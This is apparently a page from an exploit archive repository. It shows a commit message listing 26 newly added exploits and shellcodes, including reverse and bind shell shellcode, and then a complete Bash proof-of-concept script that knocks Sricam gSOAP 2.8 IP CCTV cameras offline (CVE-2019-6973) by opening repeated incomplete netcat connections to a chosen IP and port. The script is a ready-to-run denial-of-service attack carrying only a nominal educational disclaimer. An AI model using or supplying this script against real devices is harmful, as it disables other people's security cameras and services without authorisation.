b68cbec24d
26 changes to exploits/shellcodes Sricam gSOAP 2.8 - Denial of Service Smart VPN 1.1.3.0 - Denial of Service (PoC) MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH) R 3.4.4 XP SP3 - Buffer Overflow (Non SEH) BEWARD Intercom 2.3.1 - Credentials Disclosure Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference CMSsite 1.0 - 'cat_id' SQL Injection CMSsite 1.0 - 'search' SQL Injection Cisco RV300 / RV320 - Information Disclosure Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting Newsbull Haber Script 1.0.0 - 'search' SQL Injection Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection Teameyo Project Management System 1.0 - SQL Injection Mess Management System 1.0 - SQL Injection MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting ResourceSpace 8.6 - 'collection_edit.php' SQL Injection Linux/x86 - exit(0) Shellcode (5 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2) Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes) Linux/ARM - Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)
40 lines
No EOL
1.6 KiB
Bash
Executable file
40 lines
No EOL
1.6 KiB
Bash
Executable file
#!/bin/bash
|
|
|
|
#######################################################################################
|
|
#
|
|
# Exploit Title: Sricam gSOAP 2.8 - Denial of Service
|
|
# Date: 25/01/2019
|
|
# Vendor Status: Informed (24/10/2018)
|
|
# CVE ID: CVE-2019-6973
|
|
# Exploit Author: Andrew Watson
|
|
# Contact: https://keybase.io/bitfu
|
|
# Software Version: Sricam gSOAP 2.8
|
|
# Vendor Homepage: http://www.sricam.com/
|
|
# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000
|
|
# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,
|
|
# exploitable by sending multiple incomplete requests.
|
|
# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit
|
|
#
|
|
# DISCLAIMER: This proof of concept is provided for educational purposes only!
|
|
#
|
|
#######################################################################################
|
|
|
|
|
|
if [ -z "$3" ]; then
|
|
echo "#############################################################################"
|
|
echo -e "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
|
|
echo -e "\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>"
|
|
echo "[*] Example: $0 127.0.0.1 5000 10"
|
|
echo -e "\n[!] Each DoS payload sent adds another 20 seconds downtime.\n"
|
|
exit 0
|
|
fi
|
|
|
|
time=$(expr $3 \* 20)
|
|
echo "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
|
|
echo -e "\n[+] Sending $3 DoS payloads..."
|
|
echo "[+] Expected downtime: $time seconds"
|
|
for dos in $(seq 1 $3); do
|
|
netcat $1 $2 &
|
|
done
|
|
echo -e "\n[!] $dos DoS payloads sent to: $1:$2"
|
|
echo |